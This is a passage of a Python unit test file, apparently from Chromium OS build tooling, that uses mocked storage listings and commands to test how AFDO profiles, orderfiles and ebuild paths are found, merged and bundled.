def testGetProfileAge(self):
"""Test top-level function _GetProfileAge()."""
# Test unsupported artifact_type
current_day_profile = 'R0-0.0-%d' % int(time.time())
with self.assertRaises(ValueError) as context:
toolchain_util._GetProfileAge(current_day_profile, 'unsupported_type')
self.assertEqual('Only kernel afdo is supported to check profile age.',
str(context.exception))
# Test using profile of the current day.
ret = toolchain_util._GetProfileAge(current_day_profile, 'kernel_afdo')
self.assertEqual(0, ret)
# Test using profile from the last day.
last_day_profile = 'R0-0.0-%d' % int(time.time() - 86400)
ret = toolchain_util._GetProfileAge(last_day_profile, 'kernel_afdo')
self.assertEqual(1, ret)
class PrepareBundleTest(cros_test_lib.RunCommandTempDirTestCase):
"""Setup code common to Prepare/Bundle class methods."""
def setUp(self):
self.board = 'lulu'
self.chroot = chroot_lib.Chroot(path=self.tempdir, chrome_root=self.tempdir)
self.sysroot = '/build/%s' % self.board
self.chrome_package = 'chromeos-chrome'
self.kernel_package = 'chromeos-kernel-3_14'
self.chrome_PV = 'chromeos-base/chromeos-chrome-78.0.3893.0-r1'
self.chrome_ebuild = os.path.realpath(
os.path.join(
os.path.dirname(__file__), '..', '..',
'src', 'third_party', 'chromiumos-overlay',
os.path.dirname(self.chrome_PV), 'chromeos-chrome',
'%s.ebuild' % os.path.basename(self.chrome_PV)))
self.chrome_CPV = portage_util.SplitCPV(self.chrome_PV)
self.glob = self.PatchObject(
glob, 'glob', return_value=[self.chrome_ebuild])
self.rc.AddCmdResult(partial_mock.In('rm'), returncode=0)
self.obj = toolchain_util._CommonPrepareBundle('None')
self.gs_context = self.PatchObject(self.obj, '_gs_context')
self.gsc_list = self.PatchObject(self.gs_context, 'List', return_value=[])
self.data = b'data'
self.arch = 'silvermont'
self.fetch = self.PatchObject(
gob_util, 'FetchUrl', return_value=base64.encodebytes(self.data))
class CommonPrepareBundleTest(PrepareBundleTest):
"""Test common Prepare/Bundle class methods."""
def testGetEbuildInfo(self):
"""Verify that EbuildInfo is correctly returned."""
# chrome_branch calls GetEbuildInfo.
self.assertEqual('78', self.obj.chrome_branch)
self.glob.assert_called_once()
self.glob.return_value = ['1', '2']
self.assertRaises(toolchain_util.PrepareForBuildHandlerError,
self.obj._GetEbuildInfo, 'chromeos-kernel-3_14')
def test_GetArtifactVersionInGob(self):
"""Test that we look in the right place in GoB."""
self.assertRaises(ValueError, self.obj._GetArtifactVersionInGob, 'badarch')
self.assertEqual(
self.data.decode('utf-8'), self.obj._GetArtifactVersionInGob(self.arch))
self.fetch.assert_called_once_with(
constants.EXTERNAL_GOB_HOST,
'chromium/src/+/refs/tags/%s/chromeos/profiles/%s.afdo.newest.txt'
'?format=text' % (self.chrome_CPV.version_no_rev, self.arch))
self.fetch.reset_mock()
self.fetch.return_value = ''
self.assertRaises(RuntimeError, self.obj._GetArtifactVersionInGob,
self.arch)
self.fetch.assert_called_once()
def test_GetOrderfileName(self):
"""Test that GetOrderfileName finds the right answer."""
vers = self.PatchObject(
self.obj,
'_GetArtifactVersionInGob',
return_value=('chromeos-chrome-amd64-silvermont-78-1111.0-'
'157000000-benchmark-78.0.3893.0-r1-redacted.afdo.xz'))
self.assertEqual(
'chromeos-chrome-orderfile-field-78-1111.0-'
'157000000-benchmark-78.0.3893.0-r1.orderfile',
self.obj._GetOrderfileName())
vers.assert_called_once()
def test_UpdateEbuildWithArtifacts(self):
"""Test _UpdateEbuildWithArtifacts."""
func = self.PatchObject(self.obj, '_PatchEbuild')
self.obj._UpdateEbuildWithArtifacts('chromeos-chrome', {'var': 'val'})
info = toolchain_util._EbuildInfo(
path=self.chrome_ebuild, CPV=self.chrome_CPV)
info_9999 = toolchain_util._EbuildInfo(
path=os.path.realpath(
os.path.join(
os.path.dirname(__file__), '..', '..', 'src', 'third_party',
'chromiumos-overlay', 'chromeos-base', 'chromeos-chrome',
'chromeos-chrome-9999.ebuild')),
CPV=portage_util.SplitCPV('chromeos-base/chromeos-chrome-9999'))
self.assertEqual([
mock.call(info, {'var': 'val'}, uprev=True),
mock.call(info_9999, {'var': 'val'}, uprev=False)
], func.call_args_list)
class PrepBundLatestAFDOArtifactTest(PrepareBundleTest):
"""Test related function to compare freshness of AFDO artifacts."""
def setUp(self):
self.board = 'board'
self.gs_url = 'gs://path/to/any_gs_url'
self.current_branch = '78'
self.current_arch = 'airmont'
self.MockListResult = collections.namedtuple('MockListResult',
('url', 'creation_time'))
files_in_gs_bucket = [
# Benchmark profiles
('chromeos-chrome-amd64-78.0.3893.0_rc-r1.afdo.bz2', 2.0),
('chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2', 1.0), # Latest
('chromeos-chrome-amd64-78.0.3897.0_rc-r1-merged.afdo.bz2', 3.0),
# CWP profiles
('R78-3869.38-1562580965.afdo.xz', 2.1),
('R78-3866.0-1570000000.afdo.xz', 1.1), # Latest
('R77-3811.0-1580000000.afdo.xz', 3.1),
# Kernel profiles
('R76-3869.38-1562580965.gcov.xz', 1.3),
('R76-3866.0-1570000000.gcov.xz', 2.3), # Latest
# Orderfiles
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz', 1.2), # Latest
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3850.0-r1.orderfile.xz', 2.2),
]
self.gs_list = [
self.MockListResult(url=os.path.join(self.gs_url, x), creation_time=y)
for x, y in files_in_gs_bucket
]
self.gsc_list.return_value = self.gs_list
def testFindLatestAFDOArtifactPassWithBenchmarkAFDO(self):
"""Test _FindLatestAFDOArtifact returns latest benchmark AFDO."""
latest_afdo = self.obj._FindLatestAFDOArtifact(
[self.gs_url], self.obj._RankValidBenchmarkProfiles)
self.assertEqual(
latest_afdo,
os.path.join(self.gs_url,
'chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2'))
def testFindLatestAFDOArtifactPassWithOrderfile(self):
"""Test _FindLatestAFDOArtifact return latest orderfile."""
latest_orderfile = self.obj._FindLatestAFDOArtifact(
[self.gs_url], self.obj._RankValidOrderfiles)
self.assertEqual(
latest_orderfile,
os.path.join(
self.gs_url, 'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz'))
def testFindLatestAfdoArtifactOnPriorBranch(self):
"""Test that we find a file from prior branch when we have none."""
self.obj._ebuild_info['chromeos-chrome'] = toolchain_util._EbuildInfo(
path='path',
CPV=portage_util.SplitCPV(
'chromeos-base/chromeos-chrome-79.0.3900.0-r1'))
latest_orderfile = self.obj._FindLatestAFDOArtifact(
[self.gs_url], self.obj._RankValidOrderfiles)
self.assertEqual(
latest_orderfile,
os.path.join(
self.gs_url, 'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz'))
def testFindLatestAFDOArtifactFailToFindAnyFiles(self):
"""Test function fails when no files on current branch."""
self.obj._ebuild_info['chromeos-chrome'] = toolchain_util._EbuildInfo(
path='path',
CPV=portage_util.SplitCPV(
'chromeos-base/chromeos-chrome-80.0.3950.0-r1'))
self.gsc_list.side_effect = gs.GSNoSuchKey('No files')
with self.assertRaises(RuntimeError) as context:
self.obj._FindLatestAFDOArtifact([self.gs_url],
self.obj._RankValidOrderfiles)
self.assertEqual('No files for branch 80 found in %s' % self.gs_url,
str(context.exception))
def testFindLatestAFDOArtifactsFindMaxFromInvalidFiles(self):
"""Test function fails when searching max from list of invalid files."""
mock_gs_list = [
self.MockListResult(
url=os.path.join(self.gs_url, 'Invalid-name-but-end-in-78.afdo'),
creation_time=1.0)
]
self.gsc_list.return_value = mock_gs_list
with self.assertRaises(RuntimeError) as context:
self.obj._FindLatestAFDOArtifact([self.gs_url],
self.obj._RankValidBenchmarkProfiles)
self.assertIn('No valid latest artifact was found', str(context.exception))
class PrepareForBuildHandlerTest(PrepareBundleTest):
"""Test PrepareForBuildHandler specific methods."""
def setUp(self):
self.artifact_type = 'Unspecified'
self.input_artifacts = {}
self.profile_info = {}
self.gsc_exists = None
self.orderfile_name = (
'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile')
self.afdo_name = 'chromeos-chrome-amd64-78.0.3893.0-r1.afdo'
self.PatchObject(
toolchain_util._CommonPrepareBundle,
'_GetOrderfileName',
return_value=self.orderfile_name)
self.PatchObject(
toolchain_util._CommonPrepareBundle,
'_FindLatestOrderfileArtifact',
return_value=self.orderfile_name + toolchain_util.XZ_COMPRESSION_SUFFIX)
self.patch_ebuild = self.PatchObject(toolchain_util._CommonPrepareBundle,
'_PatchEbuild')
def SetUpPrepare(self, artifact_type, input_artifacts):
"""Set up to test _Prepare${artifactType}."""
self.artifact_type = artifact_type
self.input_artifacts = input_artifacts
self.obj = toolchain_util.PrepareForBuildHandler(self.artifact_type,
self.chroot, self.sysroot,
self.board,
self.input_artifacts,
self.profile_info)
self.obj._gs_context = self.gs_context
self.PatchObject(self.obj, '_GetOrderfileName', return_value='orderfile')
self.gsc_exists = self.PatchObject(
self.gs_context, 'Exists', return_value=True)
def testPrepareUnverifiedChromeLlvmOrderfileExists(self):
"""Test that PrepareUnverfiedChromeLlvmOrderfile works when POINTLESS."""
self.SetUpPrepare(
'UnverifiedChromeLlvmOrderfile',
{'UnverifiedChromeLlvmOrderfile': ['gs://publish/location']})
self.assertEqual(toolchain_util.PrepareForBuildReturn.POINTLESS,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with(
'gs://publish/location/orderfile.xz')
def testPrepareUnverifiedChromeLlvmOrderfileMissing(self):
"""Test that PrepareUnverfiedChromeLlvmOrderfile works when NEEDED."""
self.SetUpPrepare(
'UnverifiedChromeLlvmOrderfile',
{'UnverifiedChromeLlvmOrderfile': ['gs://publish/location']})
self.gsc_exists.return_value = False
self.assertEqual(toolchain_util.PrepareForBuildReturn.NEEDED,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with(
'gs://publish/location/orderfile.xz')
def testPrepareVerifiedChromeLlvmOrderfileExists(self):
"""Test that PrepareVerfiedChromeLlvmOrderfile works when POINTLESS."""
self.SetUpPrepare(
'VerifiedChromeLlvmOrderfile', {
'UnverifiedChromeLlvmOrderfile':
['gs://path/to/unvetted', 'gs://other/path/to/unvetted']
})
self.assertEqual(toolchain_util.PrepareForBuildReturn.POINTLESS,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with('gs://path/to/vetted/%s.xz' %
self.orderfile_name)
# The ebuild is still updated.
self.patch_ebuild.assert_called_once()
def testPrepareVerifiedChromeLlvmOrderfileMissing(self):
"""Test that PrepareVerfiedChromeLlvmOrderfile works when NEEDED."""
self.SetUpPrepare(
'VerifiedChromeLlvmOrderfile', {
'UnverifiedChromeLlvmOrderfile':
['gs://path/to/unvetted', 'gs://other/path/to/unvetted']
})
self.gsc_exists.return_value = False
self.assertEqual(toolchain_util.PrepareForBuildReturn.NEEDED,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with('gs://path/to/vetted/%s.xz' %
self.orderfile_name)
self.patch_ebuild.assert_called_once()
def testPrepareUnverifiedChromeBenchmarkAfdoFile(self):
self.SetUpPrepare(
'UnverifiedChromeBenchmarkAfdoFile', {
'UnverifiedChromeBenchmarkPerfFile': ['gs://path/to/perfdata'],
'UnverifiedChromeBenchmarkAfdoFile': ['gs://path/to/unvetted'],
'ChromeDebugBinary': ['gs://image-archive/path'],
})
# Published artifact is missing, debug binary is present, perf.data is
# missing.
self.gsc_exists.side_effect = (False, True, False)
self.assertEqual(toolchain_util.PrepareForBuildReturn.NEEDED,
self.obj.Prepare())
expected = [
mock.call('gs://path/to/unvetted/'
'chromeos-chrome-amd64-78.0.3893.0-r1.afdo.bz2'),
mock.call('gs://image-archive/path/chrome.debug.bz2'),
mock.call('gs://path/to/perfdata/'
'chromeos-chrome-amd64-78.0.3893.0.perf.data.bz2'),
]
self.assertEqual(expected, self.gs_context.Exists.call_args_list)
# There is no need to patch the ebuild.
self.patch_ebuild.assert_not_called()
class BundleArtifactHandlerTest(PrepareBundleTest):
"""Test BundleArtifactHandler specific methods."""
def setUp(self):
def _Bundle(_self):
osutils.WriteFile(os.path.join(_self.output_dir, 'artifact'), 'data\n')
self.artifact_type = 'Unspecified'
self.outdir = None
self.profile_info = {}
self.orderfile_name = (
'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile')
self.gen_order = self.PatchObject(
toolchain_util.GenerateChromeOrderfile, 'Bundle', new=_Bundle)
self.PatchObject(
toolchain_util._CommonPrepareBundle,
'_GetArtifactVersionInEbuild',
return_value=self.orderfile_name)
self.PatchObject(
toolchain_util, '_GetOrderfileName', return_value=self.orderfile_name)
self.copy2 = self.PatchObject(shutil, 'copy2')
def SetUpBundle(self, artifact_type):
"""Set up to test _Bundle${artifactType}."""
self.artifact_type = artifact_type
self.outdir = os.path.join(self.tempdir, 'tmp', 'output_dir')
osutils.SafeMakedirs(self.outdir)
self.obj = toolchain_util.BundleArtifactHandler(self.artifact_type,
self.chroot, self.sysroot,
self.board, self.outdir,
self.profile_info)
self.obj._gs_context = self.gs_context
def testBundleUnverifiedChromeLlvmOrderfile(self):
"""Test that BundleUnverfiedChromeLlvmOrderfile works."""
self.SetUpBundle('UnverifiedChromeLlvmOrderfile')
artifact = os.path.join(self.outdir, 'artifact')
self.assertEqual([artifact], self.obj.Bundle())
self.copy2.assert_called_once_with(mock.ANY, artifact)
def testBundleVerifiedChromeLlvmOrderfileExists(self):
"""Test that BundleVerfiedChromeLlvmOrderfile works."""
self.SetUpBundle('VerifiedChromeLlvmOrderfile')
artifact = os.path.join(self.outdir, '%s.xz' % self.orderfile_name)
self.assertEqual([artifact], self.obj.Bundle())
self.copy2.assert_called_once_with(
os.path.join(self.chroot.path, 'build', self.board, 'opt/google/chrome',
'%s.xz' % self.orderfile_name), artifact)
def testBundleChromeClangWarningsFile(self):
"""Test that BundleChromeClangWarningsFile works."""
class mock_datetime(object):
"""Class for mocking datetime.datetime."""
@staticmethod
def strftime(_when, _fmt):
return 'DATE'
@staticmethod
def now():
return -1
self.PatchObject(datetime, 'datetime', new=mock_datetime)
self.SetUpBundle('ChromeClangWarningsFile')
artifact = os.path.join(self.outdir,
'%s.DATE.clang_tidy_warnings.tar.xz' % self.board)
self.assertEqual([artifact], self.obj.Bundle())
self.copy2.assert_called_once_with(mock.ANY, artifact)
def testBundleUnverifiedLlvmPgoFile(self):
self.SetUpBundle('UnverifiedLlvmPgoFile')
llvm_version = '10.0_pre377782_p20200113-r14'
llvm_clang_sha = 'a21beccea2020f950845cbb68db663d0737e174c'
llvm_cpv = portage_util.SplitCPV('sys-devel/llvm-%s' % llvm_version)
self.PatchObject(
self.obj,
'_GetProfileNames',
return_value=[
self.chroot.full_path(self.sysroot, 'build', 'coverage_data',
'sys-libs', 'libcxxabi', 'raw_profiles',
'libcxxabi-10.0_pre3_1673101222_0.profraw')
])
self.PatchObject(
portage_util, 'FindPackageNameMatches', return_value=[llvm_cpv])
self.rc.AddCmdResult(
partial_mock.In('clang'),
returncode=0,
stdout=('Chromium OS %s clang version 10.0.0 (/path/to/'
'llvm-project %s)\n' % (llvm_version, llvm_clang_sha)))
base = '%s-%s' % (llvm_cpv.pv, llvm_clang_sha)
artifacts = [
os.path.join(self.outdir, x)
for x in ('%s.llvm_metadata.json' % base, 'llvm_metadata.json',
'%s.llvm.profdata.tar.xz' % base)
]
self.assertEqual(artifacts, self.obj.Bundle())
def testBundleUnverifiedChromeBenchmarkPerfFile(self):
self.SetUpBundle('UnverifiedChromeBenchmarkPerfFile')
self.assertEqual([], self.obj.Bundle())
def testBundleChromeDebugBinary(self):
self.SetUpBundle('ChromeDebugBinary')
bin_path = toolchain_util._CHROME_DEBUG_BIN % {
'root': self.chroot.path,
'sysroot': self.sysroot
}
osutils.WriteFile(bin_path, '', makedirs=True)
output = os.path.join(
self.outdir,
os.path.basename(bin_path) + toolchain_util.BZ2_COMPRESSION_SUFFIX)
self.assertEqual([output], self.obj.Bundle())
class CreateAndUploadMergedAFDOProfileTest(PrepBundLatestAFDOArtifactTest):
"""Test CreateAndUploadMergedAFDOProfile and related functions.
These tests are mostly coming from cbuildbot/afdo_unittest.py, and are
written to adapt to recipe functions. When legacy builders are removed,
those tests can be safely preserved by this one.
"""
@staticmethod
def _benchmark_afdo_profile_name(major=0,
minor=0,
build=0,
patch=0,
rev=1,
merged_suffix=False,
compression_suffix=True):
suffix = '-merged' if merged_suffix else ''
result = 'chromeos-chrome-amd64-%d.%d.%d.%d_rc-r%d%s' % (
major, minor, build, patch, rev, suffix)
result += toolchain_util.AFDO_SUFFIX
if compression_suffix:
result += toolchain_util.BZ2_COMPRESSION_SUFFIX
return result
def setUp(self):
self.benchmark_url = 'gs://path/to/unvetted'
self.obj.input_artifacts = {
'UnverifiedChromeBenchmarkAfdoFile': [self.benchmark_url],
}
self.obj.chroot = self.chroot
self.output_dir = os.path.join(self.chroot.path, 'tmp', 'output_dir')
osutils.SafeMakedirs(self.output_dir)
self.output_dir_inchroot = self.chroot.chroot_path(self.output_dir)
self.now = datetime.datetime.now()
def runCreateAndUploadMergedAFDOProfileOnce(self, **kwargs):
if 'unmerged_name' not in kwargs:
# Match everything.
kwargs['unmerged_name'] = self._benchmark_afdo_profile_name(
major=9999, compression_suffix=False)
if 'output_dir' not in kwargs:
kwargs['output_dir'] = self.output_dir
Mocks = collections.namedtuple('Mocks', [
'gs_context',
'find_artifact',
'run_command',
'uncompress_file',
'compress_file',
'process_afdo_profile',
])
def MockList(*_args, **_kwargs):
files = [
self._benchmark_afdo_profile_name(major=10, build=9),
self._benchmark_afdo_profile_name(major=10, build=10),
self._benchmark_afdo_profile_name(
major=10, build=10, merged_suffix=True),
self._benchmark_afdo_profile_name(major=10, build=11),
self._benchmark_afdo_profile_name(major=10, build=12),
self._benchmark_afdo_profile_name(major=10, build=13),
self._benchmark_afdo_profile_name(
major=10, build=13, merged_suffix=True),
self._benchmark_afdo_profile_name(major=10, build=13, patch=1),
self._benchmark_afdo_profile_name(major=10, build=13, patch=2),
self._benchmark_afdo_profile_name(
major=10, build=13, patch=2, merged_suffix=True),
self._benchmark_afdo_profile_name(major=11, build=14),
self._benchmark_afdo_profile_name(
major=11, build=14, merged_suffix=True),
self._benchmark_afdo_profile_name(major=11, build=15),
]
results = []
for i, name in enumerate(files):
url = os.path.join(self.benchmark_url, name)
now = self.now - datetime.timedelta(days=len(files) - i)
results.append(self.MockListResult(url=url, creation_time=now))
return results
self.gs_context.List = MockList
run_command = self.PatchObject(cros_build_lib, 'run')
uncompress_file = self.PatchObject(cros_build_lib, 'UncompressFile')
compress_file = self.PatchObject(cros_build_lib, 'CompressFile')
process_afdo_profile = self.PatchObject(self.obj, '_ProcessAFDOProfile')
unmerged_profile = os.path.join(self.output_dir,
kwargs.pop('unmerged_name'))
osutils.Touch(unmerged_profile)
kwargs['unmerged_profile'] = unmerged_profile
merged_name = self.obj._CreateAndUploadMergedAFDOProfile(**kwargs)
return merged_name, Mocks(
gs_context=self.gs_context,
find_artifact=MockList,
run_command=run_command,
uncompress_file=uncompress_file,
compress_file=compress_file,
process_afdo_profile=process_afdo_profile,
)
def testCreateAndUploadMergedAFDOProfileErrorWhenProfileInBucket(self):
unmerged_name = self._benchmark_afdo_profile_name(major=10, build=13)
merged_name = None
with self.assertRaises(AssertionError):
merged_name, _ = self.runCreateAndUploadMergedAFDOProfileOnce(
unmerged_name=unmerged_name)
self.assertIsNone(merged_name)
def testCreateAndUploadMergedAFDOProfileMergesBranchProfiles(self):
unmerged_name = self._benchmark_afdo_profile_name(
major=10, build=13, patch=99, compression_suffix=False)
merged_name, mocks = self.runCreateAndUploadMergedAFDOProfileOnce(
unmerged_name=unmerged_name)
self.assertIsNotNone(merged_name)
def _afdo_name(major, build, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
expected_unordered_args = [
'-output=' + os.path.join(
self.output_dir_inchroot, 'raw-' +
_afdo_name(major=10, build=13, patch=99, merged_suffix=True))
] + [
'-weighted-input=1,' + os.path.join(self.output_dir_inchroot, s)
for s in [
_afdo_name(major=10, build=12),
_afdo_name(major=10, build=13),
_afdo_name(major=10, build=13, patch=1),
_afdo_name(major=10, build=13, patch=2),
_afdo_name(major=10, build=13, patch=99),
]
]
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
self.assertEqual(mocks.gs_context.Copy.call_count, 4)
def testCreateAndUploadMergedAFDOProfileRemovesIndirectCallTargets(self):
unmerged_name = self._benchmark_afdo_profile_name(
major=10, build=13, patch=99, compression_suffix=False)
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce(
recent_to_merge=2,
unmerged_name=unmerged_name)
self.assertIsNotNone(merged_name)
def _afdo_name(major, build, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
merge_output_name = 'raw-' + _afdo_name(
major=10, build=13, patch=99, merged_suffix=True)
self.assertNotEqual(merged_name, merge_output_name)
expected_unordered_args = [
'-output=' + os.path.join(self.output_dir_inchroot, merge_output_name),
'-weighted-input=1,' + os.path.join(
self.output_dir_inchroot, _afdo_name(major=10, build=13, patch=2)),
'-weighted-input=1,' + os.path.join(
self.output_dir_inchroot, _afdo_name(major=10, build=13, patch=99)),
]
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
mocks.process_afdo_profile.assert_called_once_with(
os.path.join(self.output_dir, merge_output_name),
os.path.join(self.output_dir, merged_name),
redact=False,
remove=True,
compbinary=False,
)
def testCreateAndUploadMergedAFDOProfileWorksInTheHappyCase(self):
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce()
self.assertIsNotNone(merged_name)
# Note that we always return the *basename*
self.assertEqual(
merged_name,
self._benchmark_afdo_profile_name(
major=9999, merged_suffix=True, compression_suffix=False))
mocks.run_command.assert_called_once()
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
def _afdo_name(major, build=0, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
input_afdo_names = [
_afdo_name(major=10, build=13, patch=1),
_afdo_name(major=10, build=13, patch=2),
_afdo_name(major=11, build=14),
_afdo_name(major=11, build=15),
_afdo_name(major=9999),
]
output_afdo_name = _afdo_name(major=9999, merged_suffix=True)
expected_unordered_args = [
'-output=' +
os.path.join(self.output_dir_inchroot, 'raw-' + output_afdo_name)
] + [
'-weighted-input=1,' + os.path.join(self.output_dir_inchroot, n)
for n in input_afdo_names
]
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
self.assertEqual(mocks.gs_context.Copy.call_count, 4)
self.assertEqual(mocks.uncompress_file.call_count, 4)
def call_for(name):
basis = os.path.join(self.output_dir, name)
return mock.call(basis + toolchain_util.BZ2_COMPRESSION_SUFFIX, basis)
# The last profile is not compressed, so no need to uncompress it
mocks.uncompress_file.assert_has_calls(
any_order=True, calls=[call_for(n) for n in input_afdo_names[:-1]])
def testMergeIsOKIfWeFindFewerProfilesThanWeWant(self):
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce(recent_to_merge=1000,
max_age_days=1000)
self.assertIsNotNone(merged_name)
self.assertEqual(mocks.gs_context.Copy.call_count, 9)
def testNoFilesAfterUnmergedNameAreIncluded(self):
max_name = self._benchmark_afdo_profile_name(
major=10, build=11, patch=2, compression_suffix=False)
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce(unmerged_name=max_name)
self.assertIsNotNone(merged_name)
self.assertEqual(
self._benchmark_afdo_profile_name(
major=10,
build=11,
patch=2,
merged_suffix=True,
compression_suffix=False), merged_name)
def _afdo_name(major, build, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
expected_unordered_args = [
'-output=' + os.path.join(
self.output_dir_inchroot, 'raw-' +
_afdo_name(major=10, build=11, patch=2, merged_suffix=True)),
] + [
'-weighted-input=1,' + os.path.join(self.output_dir_inchroot, s)
for s in [
_afdo_name(major=10, build=9),
_afdo_name(major=10, build=10),
_afdo_name(major=10, build=11),
_afdo_name(major=10, build=11, patch=2),
]
]
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
self.assertEqual(mocks.gs_context.Copy.call_count, 3)
self.assertEqual(mocks.uncompress_file.call_count, 3)
def testMergeDoesntHappenIfNoProfilesAreMerged(self):
runs = [
self.runCreateAndUploadMergedAFDOProfileOnce(recent_to_merge=1),
self.runCreateAndUploadMergedAFDOProfileOnce(max_age_days=0),
]
for merged_name, mocks in runs:
self.assertIsNone(merged_name)
self.gs_context.Copy.assert_not_called()
mocks.run_command.assert_not_called()
mocks.uncompress_file.assert_not_called()
mocks.compress_file.assert_not_called()
class FindEbuildPathTest(cros_test_lib.MockTempDirTestCase):
"""Test top-level function _FindEbuildPath()."""
def setUp(self):
self.board = 'lulu'
self.chrome_package = 'chromeos-chrome'
self.kernel_package = 'chromeos-kernel-3_14'
self.chrome_ebuild = \
'/mnt/host/source/src/path/to/chromeos-chrome-1.0.ebuild'
mock_result = cros_build_lib.CommandResult(output=self.chrome_ebuild)
self.mock_command = self.PatchObject(
cros_build_lib, 'run', return_value=mock_result)
# pylint: disable=protected-access
def testInvalidPackage(self):
"""Test invalid package name."""
with self.assertRaises(ValueError) as context:
toolchain_util._FindEbuildPath('some-invalid-package')
self.assertIn('Invalid package name', str(context.exception))
self.mock_command.assert_not_called()
def testChromePackagePass(self):
"""Test finding chrome ebuild work."""
ebuild_file = toolchain_util._FindEbuildPath(self.chrome_package)
cmd = ['equery', 'w', self.chrome_package]
self.mock_command.assert_called_with(
cmd, enter_chroot=True, stdout=True, encoding='utf-8')
self.assertEqual(ebuild_file, self.chrome_ebuild)
def testKernelPackagePass(self):
"""Test finding kernel ebuild work."""
ebuild_path = \
'/mnt/host/source/src/path/to/chromeos-kernel-3_14-3.14-r1.ebuild'
mock_result = cros_build_lib.CommandResult(output=ebuild_path)
mock_command = self.PatchObject(
cros_build_lib, 'run', return_value=mock_result)
ebuild_file = toolchain_util._FindEbuildPath(self.kernel_package)
cmd = ['equery', 'w', self.kernel_package]
mock_command.assert_called_with(
cmd, enter_chroot=True, stdout=True, encoding='utf-8')
self.assertEqual(ebuild_file, ebuild_path)
def testPassWithBoardName(self):
"""Test working with a board name."""
ebuild_file = toolchain_util._FindEbuildPath(
self.chrome_package, board='board')
cmd = ['equery-board', 'w', self.chrome_package]
self.mock_command.assert_called_with(
cmd, enter_chroot=True, stdout=True, encoding='utf-8')
self.assertEqual(ebuild_file, self.chrome_ebuild)
def testReturnPathOutsideChroot(self):
"""Test returning correct path outside chroot."""
ebuild_file = toolchain_util._FindEbuildPath(
self.chrome_package, buildroot='/path/to/buildroot')
self.assertEqual(
ebuild_file,
'/path/to/buildroot/src/path/to/chromeos-chrome-1.0.ebuild')
class LatestAFDOArtifactTest(cros_test_lib.RunCommandTempDirTestCase):
"""Test related function to compare freshness of AFDO artifacts."""
# pylint: disable=protected-access
def setUp(self):
self.board = 'board'
self.gs_url = 'gs://path/to/any_gs_url'
self.current_branch = '78'
self.current_arch = 'airmont'
self.MockListResult = collections.namedtuple('MockListResult',
('url', 'creation_time'))
files_in_gs_bucket = [
# Benchmark profiles
('chromeos-chrome-amd64-78.0.3893.0_rc-r1.afdo.bz2', 2.0),
('chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2', 1.0), # Latest
('chromeos-chrome-amd64-78.0.3897.0_rc-r1-merged.afdo.bz2', 3.0),
# CWP profiles
('R78-3869.38-1562580965.afdo.xz', 2.1),
('R78-3866.0-1570000000.afdo.xz', 1.1), # Latest
('R77-3811.0-1580000000.afdo.xz', 3.1),
# Kernel profiles
('R76-3869.38-1562580965.gcov.xz', 1.3),
('R76-3866.0-1570000000.gcov.xz', 2.3), # Latest
# Orderfiles
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz', 1.2), # Latest
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3850.0-r1.orderfile.xz', 2.2),
]
self.gs_list = [
self.MockListResult(url=os.path.join(self.gs_url, x), creation_time=y)
for x, y in files_in_gs_bucket
]
self.PatchObject(gs.GSContext, 'List', return_value=self.gs_list)
self.PatchObject(
toolchain_util,
'_FindCurrentChromeBranch',
return_value=self.current_branch)
def testFindCurrentChromeBranch(self):
"""Test _FindCurrentChromeBranch() works correctly."""
